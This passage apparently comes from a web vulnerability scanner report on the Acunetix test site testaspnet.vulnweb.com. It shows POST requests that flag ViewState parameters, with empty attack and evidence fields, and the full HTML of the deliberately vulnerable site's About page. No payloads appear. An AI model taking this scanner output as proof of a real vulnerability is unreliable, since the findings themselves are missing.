value="/wEWVwKqq9H0CQL+kPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK+b8FAor5vwUCivnT2QkCivnT2QkCivnH/AICivnH/AICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P/xAkCv5P/xAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBMr7fvEMmSiYYPLDantQRZkqAblw" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> <h1>About this website</h1> <p>The website was built with the intention to test the Acunetix Web Vulnerability Scanner. For this reason this website have <b>lot of bugs</b> to demonstrate the forementioned software's capabilities to find those bugs.</p> <p><b>Please DO NOT use this website as a blog or news site. DO NOT post any sensitive information on this site. This includes e-mail addresses or real names.</b></p> <h1>About Acunetix</h1> <P><B>Combating the web vulnerability threat<BR> </B>Securing a company's web applications is today's most overlooked aspect of securing the enterprise. Web application hacking is on the rise with as many as 75% of cyber attacks done at web application level or via the web. Most corporations have secured their data at the network level, but have overlooked the crucial step of checking whether their web applications are vulnerable to attack. Web applications, which often have a direct line into the company's most valuable data assets, are online 24/7, completely unprotected by a firewall and therefore easy prey for attackers.</P> <P>Acunetix was founded with this threat in mind. We realised the only way to combat web site hacking was to develop an automated tool that could help companies scan their web applications for vulnerabilities. In July 2005, Acunetix Web Vulnerability Scanner was released - a tool that crawls the website for vulnerabilities to SQL injection, cross site scripting and other web attacks before hackers do.</P> <P>The Acunetix development team consists of highly experienced security developers who have each spent years developing network security scanning software prior to starting development on Acunetix WVS. The management team is backed by years of experience marketing and selling security software.</P> <P>Acunetix is a privately held company with its <A href="https://www.acunetix.com/company/contact/"> offices</A> in Malta, US and the UK. </P> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8340')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">December 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8401')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8366')" style="color:Black" title="November 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8367')" style="color:Black" title="November 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8368')" style="color:Black" title="November 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8369')" style="color:Black" title="November 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8370')" style="color:Black" title="December 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8371')" style="color:Black" title="December 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8372')" style="color:Black" title="December 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8373')" style="color:Black" title="December 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8374')" style="color:Black" title="December 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8375')" style="color:Black" title="December 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8376')" style="color:Black" title="December 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8377')" style="color:Black" title="December 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8378')" style="color:Black" title="December 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8379')" style="color:Black" title="December 10">10</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8380')" style="color:Black" title="December 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8381')" style="color:Black" title="December 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8382')" style="color:Black" title="December 13">13</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8383')" style="color:Black" title="December 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8384')" style="color:Black" title="December 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8385')" style="color:Black" title="December 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8386')" style="color:Black" title="December 17">17</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8387')" style="color:Black" title="December 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8388')" style="color:Black" title="December 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8389')" style="color:Black" title="December 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8390')" style="color:Black" title="December 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8391')" style="color:Black" title="December 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8392')" style="color:Black" title="December 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8393')" style="color:Black" title="December 24">24</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8394')" style="color:Black" title="December 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8395')" style="color:Black" title="December 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8396')" style="color:Black" title="December 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8397')" style="color:Black" title="December 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8398')" style="color:Black" title="December 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8399')" style="color:Black" title="December 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8400')" style="color:Black" title="December 31">31</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8401')" style="color:Black" title="January 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8402')" style="color:Black" title="January 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8403')" style="color:Black" title="January 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8404')" style="color:Black" title="January 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8405')" style="color:Black" title="January 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8406')" style="color:Black" title="January 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8407')" style="color:Black" title="January 07">7</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;left:30%;position:fixed;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/about.aspx
Method	POST
Parameter	__VIEWSTATE
Attack
Evidence
Show / hide Request and Response
Request Header - size: 404 bytes.	POST http://testaspnet.vulnweb.com/about.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testaspnet.vulnweb.com/about.aspx Content-Length: 981 Cookie: ASP.NET_SessionId=3qnlyw45qx3ugzagkbwuyse5
Request Body - size: 981 bytes.	__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgICAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkZLDaiLtIJBFGHdHW8BBidJDZ856t&__VIEWSTATEGENERATOR=E809BCA5&__EVENTVALIDATION=%2FwEWVwKqq9H0CQL%2BkPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK%2Bb8FAor5vwUCivnT2QkCivnT2QkCivnH%2FAICivnH%2FAICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P%2FxAkCv5P%2FxAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBMr7fvEMmSiYYPLDantQRZkqAblw
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:41:16 GMT Content-Length: 14619
Response Body - size: 14,619 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>About</title> <meta name="GENERATOR" Content="Microsoft Visual Studio .NET 7.1"> <meta name="CODE_LANGUAGE" Content="C#"> <meta name="vs_defaultClientScript" content="JavaScript"> <meta name="vs_targetSchema" content="http://schemas.microsoft.com/intellisense/ie5"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="about.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgICAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkZLDaiLtIJBFGHdHW8BBidJDZ856t" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="E809BCA5" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwKqq9H0CQL+kPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK+b8FAor5vwUCivnT2QkCivnT2QkCivnH/AICivnH/AICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P/xAkCv5P/xAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBMr7fvEMmSiYYPLDantQRZkqAblw" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> <h1>About this website</h1> <p>The website was built with the intention to test the Acunetix Web Vulnerability Scanner. For this reason this website have <b>lot of bugs</b> to demonstrate the forementioned software's capabilities to find those bugs.</p> <p><b>Please DO NOT use this website as a blog or news site. DO NOT post any sensitive information on this site. This includes e-mail addresses or real names.</b></p> <h1>About Acunetix</h1> <P><B>Combating the web vulnerability threat<BR> </B>Securing a company's web applications is today's most overlooked aspect of securing the enterprise. Web application hacking is on the rise with as many as 75% of cyber attacks done at web application level or via the web. Most corporations have secured their data at the network level, but have overlooked the crucial step of checking whether their web applications are vulnerable to attack. Web applications, which often have a direct line into the company's most valuable data assets, are online 24/7, completely unprotected by a firewall and therefore easy prey for attackers.</P> <P>Acunetix was founded with this threat in mind. We realised the only way to combat web site hacking was to develop an automated tool that could help companies scan their web applications for vulnerabilities. In July 2005, Acunetix Web Vulnerability Scanner was released - a tool that crawls the website for vulnerabilities to SQL injection, cross site scripting and other web attacks before hackers do.</P> <P>The Acunetix development team consists of highly experienced security developers who have each spent years developing network security scanning software prior to starting development on Acunetix WVS. The management team is backed by years of experience marketing and selling security software.</P> <P>Acunetix is a privately held company with its <A href="https://www.acunetix.com/company/contact/"> offices</A> in Malta, US and the UK. </P> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8340')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">December 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8401')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8366')" style="color:Black" title="November 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8367')" style="color:Black" title="November 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8368')" style="color:Black" title="November 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8369')" style="color:Black" title="November 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8370')" style="color:Black" title="December 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8371')" style="color:Black" title="December 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8372')" style="color:Black" title="December 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8373')" style="color:Black" title="December 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8374')" style="color:Black" title="December 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8375')" style="color:Black" title="December 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8376')" style="color:Black" title="December 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8377')" style="color:Black" title="December 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8378')" style="color:Black" title="December 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8379')" style="color:Black" title="December 10">10</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8380')" style="color:Black" title="December 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8381')" style="color:Black" title="December 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8382')" style="color:Black" title="December 13">13</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8383')" style="color:Black" title="December 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8384')" style="color:Black" title="December 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8385')" style="color:Black" title="December 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8386')" style="color:Black" title="December 17">17</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8387')" style="color:Black" title="December 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8388')" style="color:Black" title="December 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8389')" style="color:Black" title="December 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8390')" style="color:Black" title="December 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8391')" style="color:Black" title="December 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8392')" style="color:Black" title="December 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8393')" style="color:Black" title="December 24">24</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8394')" style="color:Black" title="December 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8395')" style="color:Black" title="December 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8396')" style="color:Black" title="December 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8397')" style="color:Black" title="December 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8398')" style="color:Black" title="December 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8399')" style="color:Black" title="December 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8400')" style="color:Black" title="December 31">31</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8401')" style="color:Black" title="January 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8402')" style="color:Black" title="January 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8403')" style="color:Black" title="January 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8404')" style="color:Black" title="January 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8405')" style="color:Black" title="January 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8406')" style="color:Black" title="January 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8407')" style="color:Black" title="January 07">7</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;left:30%;position:fixed;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/about.aspx
Method	POST
Parameter	__VIEWSTATEGENERATOR
Attack
Evidence
Show / hide Request and Response
Request Header - size: 404 bytes.	POST http://testaspnet.vulnweb.com/about.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testaspnet.vulnweb.com/about.aspx Content-Length: 981 Cookie: ASP.NET_SessionId=3qnlyw45qx3ugzagkbwuyse5
Request Body - size: 981 bytes.	__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgICAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkZLDaiLtIJBFGHdHW8BBidJDZ856t&__VIEWSTATEGENERATOR=E809BCA5&__EVENTVALIDATION=%2FwEWVwKqq9H0CQL%2BkPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK%2Bb8FAor5vwUCivnT2QkCivnT2QkCivnH%2FAICivnH%2FAICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P%2FxAkCv5P%2FxAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBMr7fvEMmSiYYPLDantQRZkqAblw
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:41:16 GMT Content-Length: 14619
